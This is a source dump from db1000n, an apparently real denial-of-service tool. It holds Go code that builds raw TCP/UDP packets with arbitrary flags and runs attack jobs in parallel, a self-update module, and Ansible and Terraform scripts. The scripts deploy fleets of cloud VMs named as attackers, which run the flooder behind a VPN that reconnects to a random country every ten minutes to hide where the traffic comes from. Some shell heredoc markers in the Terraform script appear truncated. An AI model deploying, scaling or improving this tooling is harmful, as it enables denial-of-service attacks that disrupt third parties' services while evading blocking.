    Low response rate alone is not enough to be a problem as it could be an indication that current targets are down but you can try to perform additional checks in case you think the rate is abnormal (trying to access one of the targets via curl/browser, checking network stats via other tools like bmon/Task manager, enabling and inspecting debug logs, etc.)
--------------------------------------------------------------------------------
/ansible/linux/setup.yaml:
--------------------------------------------------------------------------------
# Provision a plain Ubuntu VM with Docker and run db1000n, optionally behind
# an ExpressVPN container. Controlled by the `setup_vpn` variable and, when
# VPN is enabled, by `expressvpn_activation_code`.
- name: setup db1000n on plain VM
  gather_facts: false
  hosts: all
  become: true
  tasks:

    - name: cleanup old Docker versions
      apt:
        pkg: "{{ item }}"
        state: absent
      loop:
        - docker
        - docker-engine
        - docker.io
        - containerd
        - runc

    - name: update repositories and install packages
      apt:
        pkg: "{{ item }}"
        state: present
        update_cache: yes
      loop:
        - ca-certificates
        - curl
        - gnupg
        - lsb-release
        - cron

    - name: add Docker repository
      shell: |
        curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
        echo \
          "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu \
          $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null

    - name: install Docker
      apt:
        pkg: "{{ item }}"
        state: present
        update_cache: yes
      loop:
        - docker-ce
        - docker-ce-cli
        - containerd.io

    # `setup_vpn | default(false) | bool` instead of `setup_vpn == True`:
    # works whether the variable is undefined, a YAML boolean, or the string
    # "true"/"false" coming from inventory or --extra-vars.
    - name: copy VPN countries list
      copy:
        src: countries.txt
        dest: /countries.txt
      when: setup_vpn | default(false) | bool

    - name: initial cron script
      shell: |
        echo "#! /bin/bash" >> /run.sh
        echo "docker stop db1000n" >> /run.sh
        chmod +x /run.sh

    - name: add VPN reconnect and docker run to cron script
      shell: |
        echo "docker exec vpn expressvpn disconnect" >> /run.sh
        echo 'docker exec vpn expressvpn connect "$(shuf -n 1 /countries.txt)"' >> /run.sh
        echo "docker run --name=db1000n --pull=always --net=container:vpn -e PUID=1000 -e PGID=1000 -e ENABLE_PRIMITIVE=false --rm -d ghcr.io/arriven/db1000n:latest" >> /run.sh
      when: setup_vpn | default(false) | bool

    - name: add docker run to cron script
      shell: |
        echo "docker run --name=db1000n --pull=always -e PUID=1000 -e PGID=1000 -e ENABLE_PRIMITIVE=false --rm -d ghcr.io/arriven/db1000n:latest" >> /run.sh
      when: not (setup_vpn | default(false) | bool)

    - name: start VPN container
      shell: |
        docker run \
          --env=ACTIVATION_CODE={{ expressvpn_activation_code }} \
          --env=PREFERRED_PROTOCOL=auto \
          --env=LIGHTWAY_CIPHER=auto \
          --env=SERVER=$(shuf -n 1 /countries.txt) \
          -e NETWORK=192.168.1.0/24 \
          --cap-add=NET_ADMIN \
          --device=/dev/net/tun \
          --privileged \
          --tty=true \
          --name=vpn \
          --detach=true \
          --dns=1.1.1.1 \
          --tty=true \
          polkaned/expressvpn \
          /bin/bash

        sleep 10
      when: (setup_vpn | default(false) | bool) and (expressvpn_activation_code is defined) and (expressvpn_activation_code|length > 0)

    # NOTE(review): this appends a fresh crontab entry on every playbook run,
    # so repeated runs duplicate the line — TODO confirm whether idempotence
    # matters here before changing it.
    - name: update crontab
      shell: (crontab -l ; echo '*/10 * * * * /usr/bin/sudo /run.sh') | crontab -

    - name: initial Docker run with VPN
      shell: docker run --name=db1000n --net=container:vpn -e PUID=1000 -e PGID=1000 -e ENABLE_PRIMITIVE=false --rm -d ghcr.io/arriven/db1000n:latest
      when: setup_vpn | default(false) | bool

    - name: initial Docker run without VPN
      shell: docker run --name=db1000n -e PUID=1000 -e PGID=1000 -e ENABLE_PRIMITIVE=false --rm -d ghcr.io/arriven/db1000n:latest
      when: not (setup_vpn | default(false) | bool)
--------------------------------------------------------------------------------
/src/job/complex.go:
--------------------------------------------------------------------------------
// MIT License

// Copyright (c) [2022] [Bohdan Ivashko (https://github.com/Arriven)]

// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:

// The above copyright notice and this permission notice shall be included in all
// copies or substantial portions of the Software.

// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
// SOFTWARE.
22 | 23 | package job 24 | 25 | import ( 26 | "context" 27 | "fmt" 28 | "sync" 29 | 30 | "github.com/google/uuid" 31 | "go.uber.org/zap" 32 | 33 | "github.com/Arriven/db1000n/src/job/config" 34 | "github.com/Arriven/db1000n/src/utils/metrics" 35 | "github.com/Arriven/db1000n/src/utils/templates" 36 | ) 37 | 38 | // "sequence" in config 39 | func sequenceJob(ctx context.Context, args config.Args, globalConfig *GlobalConfig, a *metrics.Accumulator, logger *zap.Logger) (data any, err error) { 40 | var jobConfig struct { 41 | BasicJobConfig 42 | 43 | Jobs []config.Config 44 | } 45 | 46 | if err := ParseConfig(&jobConfig, args, *globalConfig); err != nil { 47 | return nil, fmt.Errorf("error parsing job config: %w", err) 48 | } 49 | 50 | for _, cfg := range jobConfig.Jobs { 51 | job := Get(cfg.Type) 52 | if job == nil { 53 | return nil, fmt.Errorf("unknown job %q", cfg.Type) 54 | } 55 | 56 | data, err := job(ctx, cfg.Args, globalConfig, a, logger) 57 | if err != nil { 58 | return nil, fmt.Errorf("error running job: %w", err) 59 | } 60 | 61 | ctx = context.WithValue(ctx, templates.ContextKey("data."+cfg.Name), data) 62 | } 63 | 64 | return nil, nil 65 | } 66 | 67 | // "parallel" in config 68 | func parallelJob(ctx context.Context, args config.Args, globalConfig *GlobalConfig, a *metrics.Accumulator, logger *zap.Logger) (data any, err error) { 69 | ctx, cancel := context.WithCancel(ctx) 70 | defer cancel() 71 | 72 | var jobConfig struct { 73 | BasicJobConfig 74 | 75 | Jobs []config.Config 76 | } 77 | 78 | if err := ParseConfig(&jobConfig, args, *globalConfig); err != nil { 79 | return nil, fmt.Errorf("error parsing job config: %w", err) 80 | } 81 | 82 | var wg sync.WaitGroup 83 | 84 | for i := range jobConfig.Jobs { 85 | job := Get(jobConfig.Jobs[i].Type) 86 | if job == nil { 87 | logger.Warn("Unknown job", zap.String("type", jobConfig.Jobs[i].Type)) 88 | 89 | continue 90 | } 91 | 92 | if globalConfig.ScaleFactor > 0 { 93 | jobConfig.Jobs[i].Count = 
computeCount(jobConfig.Jobs[i].Count, globalConfig.ScaleFactor) 94 | } 95 | 96 | for j := 0; j < jobConfig.Jobs[i].Count; j++ { 97 | wg.Add(1) 98 | 99 | go func(i int, a *metrics.Accumulator) { 100 | if _, err := job(ctx, jobConfig.Jobs[i].Args, globalConfig, a, logger); err != nil { 101 | logger.Error("error running one of the jobs", zap.Error(err)) 102 | } 103 | 104 | wg.Done() 105 | }(i, a.Clone(uuid.NewString())) // metrics.Accumulator is not safe for concurrent use, so let's make a new one 106 | } 107 | } 108 | 109 | wg.Wait() 110 | 111 | return nil, nil 112 | } 113 | -------------------------------------------------------------------------------- /src/core/packetgen/connection.go: -------------------------------------------------------------------------------- 1 | // MIT License 2 | 3 | // Copyright (c) [2022] [Bohdan Ivashko (https://github.com/Arriven)] 4 | 5 | // Permission is hereby granted, free of charge, to any person obtaining a copy 6 | // of this software and associated documentation files (the "Software"), to deal 7 | // in the Software without restriction, including without limitation the rights 8 | // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | // copies of the Software, and to permit persons to whom the Software is 10 | // furnished to do so, subject to the following conditions: 11 | 12 | // The above copyright notice and this permission notice shall be included in all 13 | // copies or substantial portions of the Software. 14 | 15 | // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE 18 | // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | // SOFTWARE. 22 | 23 | package packetgen 24 | 25 | import ( 26 | "context" 27 | "crypto/tls" 28 | "fmt" 29 | "net" 30 | "time" 31 | 32 | "github.com/google/gopacket" 33 | 34 | "github.com/Arriven/db1000n/src/utils" 35 | ) 36 | 37 | // ConnectionConfig describes which network to use when sending packets 38 | type ConnectionConfig struct { 39 | Type string 40 | Args map[string]any 41 | Proxy *utils.ProxyParams 42 | } 43 | 44 | func OpenConnection(ctx context.Context, c ConnectionConfig) (Connection, error) { 45 | switch c.Type { 46 | case "raw": 47 | return openRawConn() 48 | case "net": 49 | var cfg netConnConfig 50 | if err := utils.Decode(c.Args, &cfg); err != nil { 51 | return nil, fmt.Errorf("error decoding connection config: %w", err) 52 | } 53 | 54 | return openNetConn(ctx, cfg, c.Proxy) 55 | default: 56 | return nil, fmt.Errorf("unknown connection type: %v", c.Type) 57 | } 58 | } 59 | 60 | type Connection interface { 61 | Write(Packet) (int, error) 62 | Read([]byte) (int, error) 63 | Close() error 64 | Target() string 65 | } 66 | 67 | type netConnConfig struct { 68 | Protocol string 69 | Address string 70 | Timeout time.Duration 71 | Proxy utils.ProxyParams 72 | TLSClientConfig *tls.Config 73 | } 74 | 75 | type netConn struct { 76 | net.Conn 77 | buf gopacket.SerializeBuffer 78 | 79 | target string 80 | } 81 | 82 | func openNetConn(ctx context.Context, c netConnConfig, proxyParams *utils.ProxyParams) (*netConn, error) { 83 | conn, err := utils.GetProxyFunc(ctx, utils.NonNilOrDefault(proxyParams, utils.ProxyParams{}), c.Protocol)(c.Protocol, c.Address) 84 | 85 | switch { 86 | case err != nil: 87 | return nil, err 88 | case c.TLSClientConfig == nil: 89 | return &netConn{Conn: conn, buf: 
gopacket.NewSerializeBuffer(), target: c.Protocol + "://" + c.Address}, nil 90 | } 91 | 92 | tlsConn := tls.Client(conn, c.TLSClientConfig) 93 | if err = tlsConn.Handshake(); err != nil { 94 | tlsConn.Close() 95 | 96 | return nil, err 97 | } 98 | 99 | return &netConn{Conn: tlsConn, buf: gopacket.NewSerializeBuffer(), target: c.Protocol + "://" + c.Address}, nil 100 | } 101 | 102 | func (conn *netConn) Write(packet Packet) (n int, err error) { 103 | if err = packet.Serialize(conn.buf); err != nil { 104 | return 0, fmt.Errorf("error serializing packet: %w", err) 105 | } 106 | 107 | return conn.Conn.Write(conn.buf.Bytes()) 108 | } 109 | 110 | func (conn *netConn) Close() error { 111 | return conn.Conn.Close() 112 | } 113 | 114 | func (conn *netConn) Target() string { return conn.target } 115 | 116 | func (conn *netConn) Read(buf []byte) (int, error) { return conn.Conn.Read(buf) } 117 | -------------------------------------------------------------------------------- /src/core/packetgen/transport.go: -------------------------------------------------------------------------------- 1 | // MIT License 2 | 3 | // Copyright (c) [2022] [Bohdan Ivashko (https://github.com/Arriven)] 4 | 5 | // Permission is hereby granted, free of charge, to any person obtaining a copy 6 | // of this software and associated documentation files (the "Software"), to deal 7 | // in the Software without restriction, including without limitation the rights 8 | // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | // copies of the Software, and to permit persons to whom the Software is 10 | // furnished to do so, subject to the following conditions: 11 | 12 | // The above copyright notice and this permission notice shall be included in all 13 | // copies or substantial portions of the Software. 
14 | 15 | // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | // SOFTWARE. 22 | 23 | package packetgen 24 | 25 | import ( 26 | "fmt" 27 | 28 | "github.com/google/gopacket" 29 | "github.com/google/gopacket/layers" 30 | 31 | "github.com/Arriven/db1000n/src/utils" 32 | ) 33 | 34 | func BuildTransportLayer(c LayerConfig, network gopacket.NetworkLayer) (gopacket.TransportLayer, error) { 35 | switch c.Type { 36 | case "": 37 | return nil, nil 38 | case "tcp": 39 | var packetConfig TCPPacketConfig 40 | if err := utils.Decode(c.Data, &packetConfig); err != nil { 41 | return nil, err 42 | } 43 | 44 | return buildTCPPacket(packetConfig, network), nil 45 | case "udp": 46 | var packetConfig UDPPacketConfig 47 | if err := utils.Decode(c.Data, &packetConfig); err != nil { 48 | return nil, err 49 | } 50 | 51 | return buildUDPPacket(packetConfig, network), nil 52 | default: 53 | return nil, fmt.Errorf("unsupported link layer type %s", c.Type) 54 | } 55 | } 56 | 57 | // UDPPacketConfig describes udp layer configuration 58 | type UDPPacketConfig struct { 59 | SrcPort int 60 | DstPort int 61 | } 62 | 63 | func buildUDPPacket(c UDPPacketConfig, network gopacket.NetworkLayer) *layers.UDP { 64 | result := &layers.UDP{ 65 | SrcPort: layers.UDPPort(c.SrcPort), 66 | DstPort: layers.UDPPort(c.DstPort), 67 | } 68 | if err := result.SetNetworkLayerForChecksum(network); err != nil { 69 | return nil 70 | } 71 | 72 | return result 73 | } 74 | 75 | // TCPFlagsConfig stores flags to be set on tcp layer 76 | type TCPFlagsConfig struct { 77 | SYN bool 78 | ACK 
bool 79 | FIN bool 80 | RST bool 81 | PSH bool 82 | URG bool 83 | ECE bool 84 | CWR bool 85 | NS bool 86 | } 87 | 88 | // TCPPacketConfig describes tcp layer configuration 89 | type TCPPacketConfig struct { 90 | SrcPort int 91 | DstPort int 92 | Seq uint32 93 | Ack uint32 94 | Window uint16 95 | Urgent uint16 96 | Flags TCPFlagsConfig 97 | } 98 | 99 | // buildTCPPacket generates a layers.TCP and returns it with source port and destination port 100 | func buildTCPPacket(c TCPPacketConfig, network gopacket.NetworkLayer) *layers.TCP { 101 | result := &layers.TCP{ 102 | SrcPort: layers.TCPPort(c.SrcPort), 103 | DstPort: layers.TCPPort(c.DstPort), 104 | Window: c.Window, 105 | Urgent: c.Urgent, 106 | Seq: c.Seq, 107 | Ack: c.Ack, 108 | SYN: c.Flags.SYN, 109 | ACK: c.Flags.ACK, 110 | FIN: c.Flags.FIN, 111 | RST: c.Flags.RST, 112 | PSH: c.Flags.PSH, 113 | URG: c.Flags.URG, 114 | ECE: c.Flags.ECE, 115 | CWR: c.Flags.CWR, 116 | NS: c.Flags.NS, 117 | } 118 | if err := result.SetNetworkLayerForChecksum(network); err != nil { 119 | return nil 120 | } 121 | 122 | return result 123 | } 124 | -------------------------------------------------------------------------------- /src/utils/ota/README.md: -------------------------------------------------------------------------------- 1 | # Over-the-air updates 2 | 3 | Lots of maintainers run their needles on a bare metal machines. 4 | As long as this project is so frequently updated, it might be 5 | a good idea to let them update it without the hassle. 6 | 7 | - [x] Enabled automatic time-based version check 8 | - [x] Enabled application self-restart after it downloaded the update 9 | 10 | ## Description 11 | 12 | Support for the application self-update by downloading the latest release from the official repository. 13 | 14 | ```text 15 | Stay strong, be the first in line! 16 | ``` 17 | 18 | The version should be embedded in the binary during the build, see the `build` 19 | target in the Makefile. 
20 | 21 | ## Usage 22 | 23 | ### Available flags 24 | 25 | ```bash 26 | -enable-self-update 27 | Enable the application automatic updates on the startup 28 | -restart-on-update 29 | Allows application to restart upon the successful update (ignored if auto-update is disabled) (default true) 30 | -self-update-check-frequency duration 31 | How often to run auto-update checks (default 24h0m0s) 32 | -skip-update-check-on-start 33 | Allows to skip the update check at the startup (usually set automatically by the previous version) (default false) 34 | ``` 35 | 36 | The default behavior if the self-update enabled: 37 | 38 | ```bash 39 | * Check for the update 40 | * If update is available - download it 41 | * If auto-restart is enabled 42 | * Notify the user that a newer version is available 43 | * Fork-Exec a new process (will have a different PID), add a flag to skip the version check upon startup 44 | * Stop the current process 45 | * If auto-restart is disabled - notify user that manual restart is required 46 | * If update is NOT available - schedule the next check 47 | ``` 48 | 49 | ### Examples 50 | 51 | To update your needle, start it with a flag `-enable-self-update` 52 | 53 | ```sh 54 | ./db1000n -enable-self-update 55 | ``` 56 | 57 | #### Advanced options 58 | 59 | Start the needle with the **self-update & self-restart** 60 | 61 | ```bash 62 | $ ./db1000n -enable-self-update 63 | 0000/00/00 00:00:00 main.go:82: DB1000n [Version: v0.6.4][PID=75259] 64 | 0000/00/00 00:00:00 main.go:166: Running a check for a newer version... 
65 | 0000/00/00 00:00:00 main.go:176: Newer version of the application is found [0.7.0] 66 | 0000/00/00 00:00:00 main.go:177: What's new: 67 | * Added some great improvements 68 | * Added some spectacular bugs 69 | 0000/00/00 00:00:00 main.go:180: Auto restart is enabled, restarting the application to run a new version 70 | 0000/00/00 00:00:00 restart.go:45: new process has been started successfully [old_pid=75259,new_pid=75262] 71 | 72 | # NOTE: Process 75259 exited, Process 75262 has started with a flag to skip version check on the startup 73 | 74 | 0000/00/00 00:00:00 main.go:82: DB1000n [Version: v0.7.0][PID=75262] 75 | 0000/00/00 00:00:00 main.go:155: Version update on startup is skipped, next update check is scheduled in 24h0m0s 76 | ``` 77 | 78 | Start the needle with the self-update but do not restart the process upon update (`systemd` friendly) 79 | 80 | ```bash 81 | $ ./db1000n -enable-self-update -self-update-check-frequency=5m -restart-on-update=false 82 | 0000/00/00 00:00:00 main.go:82: DB1000n [Version: v0.6.4][PID=75320] 83 | 0000/00/00 00:00:00 main.go:166: Running a check for a newer version... 84 | 0000/00/00 00:00:00 main.go:176: Newer version of the application is found [0.7.0] 85 | 0000/00/00 00:00:00 main.go:177: What's new: 86 | * Added some great improvements 87 | * Added some spectacular bugs 88 | 0000/00/00 00:00:00 main.go:191: Auto restart is disabled, restart the application manually to apply changes! 89 | ``` 90 | 91 | ## References 92 | 93 | 1. Graceful restart with zero downtime for TCP connection - [https://github.com/Scalingo/go-graceful-restart-example](https://github.com/Scalingo/go-graceful-restart-example) 94 | 1. Graceful restart with zero downtime for TCP connection (two variants) [https://github.com/rcrowley/goagain](https://github.com/rcrowley/goagain) 95 | 1. 
Graceful restart with zero downtime for TCP connection (alternative) [https://grisha.org/blog/2014/06/03/graceful-restart-in-golang](https://grisha.org/blog/2014/06/03/graceful-restart-in-golang) 96 | -------------------------------------------------------------------------------- /src/utils/ota/ota.go: -------------------------------------------------------------------------------- 1 | // Package ota [allows hot update and reload of the executable] 2 | package ota 3 | 4 | import ( 5 | "flag" 6 | "fmt" 7 | "time" 8 | 9 | "github.com/blang/semver" 10 | "github.com/rhysd/go-github-selfupdate/selfupdate" 11 | "go.uber.org/zap" 12 | 13 | "github.com/Arriven/db1000n/src/utils" 14 | ) 15 | 16 | var ( 17 | // Version is a release version embedded into the app 18 | Version = "v0.0.1" 19 | // Repository to check for updates 20 | Repository = "Arriven/db1000n" // Could be changed via the ldflags 21 | ) 22 | 23 | // Config defines OTA parameters. 24 | type Config struct { 25 | doAutoUpdate, doRestartOnUpdate, skipUpdateCheckOnStart bool 26 | autoUpdateCheckFrequency time.Duration 27 | } 28 | 29 | // NewConfigWithFlags returns a Config initialized with command line flags. 
30 | func NewConfigWithFlags() *Config { 31 | const defaultUpdateCheckFrequency = 24 * time.Hour 32 | 33 | var res Config 34 | 35 | flag.BoolVar(&res.doAutoUpdate, "enable-self-update", utils.GetEnvBoolDefault("ENABLE_SELF_UPDATE", false), 36 | "Enable the application automatic updates on the startup") 37 | flag.BoolVar(&res.doRestartOnUpdate, "restart-on-update", utils.GetEnvBoolDefault("RESTART_ON_UPDATE", true), 38 | "Allows application to restart upon successful update (ignored if auto-update is disabled)") 39 | flag.BoolVar(&res.skipUpdateCheckOnStart, "skip-update-check-on-start", utils.GetEnvBoolDefault("SKIP_UPDATE_CHECK_ON_START", false), 40 | "Allows to skip the update check at the startup (usually set automatically by the previous version)") 41 | flag.DurationVar(&res.autoUpdateCheckFrequency, "self-update-check-frequency", 42 | utils.GetEnvDurationDefault("SELF_UPDATE_CHECK_FREQUENCY", defaultUpdateCheckFrequency), "How often to run auto-update checks") 43 | 44 | return &res 45 | } 46 | 47 | // WatchUpdates performs OTA updates based on the config. 
48 | func WatchUpdates(logger *zap.Logger, cfg *Config) { 49 | if !cfg.doAutoUpdate { 50 | return 51 | } 52 | 53 | if !cfg.skipUpdateCheckOnStart { 54 | runUpdate(logger, cfg.doRestartOnUpdate) 55 | } else { 56 | logger.Info("version update on startup is skipped", 57 | zap.Duration("auto_update_check_frequency", cfg.autoUpdateCheckFrequency)) 58 | } 59 | 60 | periodicalUpdateChecker := time.NewTicker(cfg.autoUpdateCheckFrequency) 61 | defer periodicalUpdateChecker.Stop() 62 | 63 | for range periodicalUpdateChecker.C { 64 | runUpdate(logger, cfg.doRestartOnUpdate) 65 | } 66 | } 67 | 68 | func runUpdate(logger *zap.Logger, doRestartOnUpdate bool) { 69 | logger.Info("running a check for a newer version") 70 | 71 | isUpdateFound, newVersion, changeLog, err := doAutoUpdate() 72 | 73 | switch { 74 | case err != nil: 75 | logger.Warn("auto-update failed", zap.Error(err)) 76 | 77 | return 78 | case !isUpdateFound: 79 | logger.Info("running the latest version") 80 | 81 | return 82 | } 83 | 84 | logger.Info("newer version of the application is found", zap.String("version", newVersion)) 85 | logger.Info("changelog", zap.String("changes", changeLog)) 86 | 87 | if !doRestartOnUpdate { 88 | logger.Warn("auto restart is disabled, restart the application manually to apply changes") 89 | 90 | return 91 | } 92 | 93 | logger.Info("auto restart is enabled, restarting the application to run a new version") 94 | 95 | if err = restart(logger, "-skip-update-check-on-start"); err != nil { 96 | logger.Warn("Failed to restart the application after the update to the new version", zap.Error(err)) 97 | logger.Warn("restart the application manually to apply changes") 98 | } 99 | } 100 | 101 | // doAutoUpdate updates the app to the latest version. 
102 | func doAutoUpdate() (updateFound bool, newVersion, changeLog string, err error) { 103 | v, err := semver.ParseTolerant(Version) 104 | if err != nil { 105 | return false, "", "", fmt.Errorf("binary version validation failed: %w", err) 106 | } 107 | 108 | latest, err := selfupdate.UpdateSelf(v, Repository) 109 | 110 | switch { 111 | case err != nil: 112 | return false, "", "", fmt.Errorf("binary update failed: %w", err) 113 | case latest.Version.Equals(v): 114 | return false, "", "", nil 115 | } 116 | 117 | return true, latest.Version.String(), latest.ReleaseNotes, nil 118 | } 119 | -------------------------------------------------------------------------------- /terraform/gcp_expressvpn/main.tf: -------------------------------------------------------------------------------- 1 | resource "google_service_account" "vm" { 2 | project = var.project_id 3 | account_id = "compute-sa" 4 | display_name = "Service Account for compute engine" 5 | } 6 | 7 | resource "google_project_iam_member" "vm_logs" { 8 | project = var.project_id 9 | role = "roles/logging.logWriter" 10 | member = "serviceAccount:${google_service_account.vm.email}" 11 | } 12 | 13 | resource "google_project_iam_member" "vm_metric" { 14 | project = var.project_id 15 | role = "roles/monitoring.metricWriter" 16 | member = "serviceAccount:${google_service_account.vm.email}" 17 | } 18 | 19 | resource "google_compute_instance_template" "atck" { 20 | name = "atck-template" 21 | machine_type = var.machine_type 22 | tags = ["default-allow-ssh"] 23 | 24 | metadata_startup_script = < /dev/null 37 | apt-get update 38 | apt-get install -y docker-ce docker-ce-cli containerd.io 39 | 40 | ulimit -n 30000 41 | ulimit -n 30000 42 | 43 | cat <> ./countries.txt 44 | Hong Kong 45 | Singapore 46 | India 47 | Canada 48 | Japan 49 | Germany 50 | Mexico 51 | Australia 52 | United Kingdom 53 | Netherlands 54 | Spain 55 | South Korea 56 | Switzerland 57 | France 58 | Philippines 59 | Malaysia 60 | Sri Lanka 61 | Italy 62 | 
Pakistan 63 | Kazakhstan 64 | Thailand 65 | Indonesia 66 | Taiwan 67 | Vietnam 68 | Macau 69 | Cambodia 70 | Mongolia 71 | Laos 72 | Myanmar 73 | Nepal 74 | Kyrgyzstan 75 | Uzbekistan 76 | Bangladesh 77 | Bhutan 78 | Brazil 79 | Panama 80 | Chile 81 | Argentina 82 | Bolivia 83 | Colombia 84 | Venezuela 85 | Ecuador 86 | Guatemala 87 | Peru 88 | Uruguay 89 | Bahamas 90 | Sweden 91 | Romania 92 | Turkey 93 | Ireland 94 | Iceland 95 | Norway 96 | Denmark 97 | Belgium 98 | Greece 99 | Portugal 100 | Austria 101 | Finland 102 | EOF 103 | 104 | sudo docker run \ 105 | --env=ACTIVATION_CODE=${var.expressvpn_key} \ 106 | --env=PREFERRED_PROTOCOL=auto \ 107 | --env=LIGHTWAY_CIPHER=auto \ 108 | --env=SERVER=$(shuf -n 1 /countries.txt) \ 109 | -e NETWORK=192.168.1.0/24 \ 110 | --cap-add=NET_ADMIN \ 111 | --device=/dev/net/tun \ 112 | --privileged \ 113 | --tty=true \ 114 | --name=vpn \ 115 | --detach=true \ 116 | --dns=1.1.1.1 \ 117 | --tty=true \ 118 | polkaned/expressvpn \ 119 | /bin/bash 120 | 121 | sleep 10 122 | 123 | cat <> ./run.sh 124 | #! 
/bin/bash 125 | docker stop db1000n 126 | docker exec vpn expressvpn disconnect 127 | docker exec vpn expressvpn connect "$(shuf -n 1 /countries.txt)" 128 | docker run --name=db1000n --pull=always --net=container:vpn -e PUID=1000 -e PGID=1000 -e ENABLE_PRIMITIVE=false --log-driver=gcplogs --rm -d ghcr.io/arriven/db1000n:latest 129 | EOF 130 | chmod +x ./run.sh 131 | 132 | (crontab -l ; echo '*/10 * * * * /usr/bin/sudo /run.sh') | crontab - 133 | 134 | docker run --name=db1000n --net=container:vpn -e PUID=1000 -e PGID=1000 -e ENABLE_PRIMITIVE=false --log-driver=gcplogs --rm -d ghcr.io/arriven/db1000n:latest 135 | 136 | EOT 137 | 138 | service_account { 139 | email = google_service_account.vm.email 140 | scopes = ["cloud-platform", "logging-write", "monitoring-write"] 141 | } 142 | 143 | network_interface { 144 | network = "default" 145 | access_config {} 146 | } 147 | 148 | disk { 149 | source_image = "projects/ubuntu-os-cloud/global/images/ubuntu-minimal-2004-focal-v20220203" 150 | auto_delete = true 151 | boot = true 152 | } 153 | 154 | scheduling { 155 | preemptible = true 156 | automatic_restart = false 157 | } 158 | } 159 | 160 | resource "google_compute_instance_group_manager" "attckrs" { 161 | name = "attckrs" 162 | base_instance_name = "atck" 163 | zone = var.machine_location 164 | target_size = var.machine_count 165 | 166 | version { 167 | instance_template = google_compute_instance_template.atck.id 168 | } 169 | } 170 | --------------------------------------------------------------------------------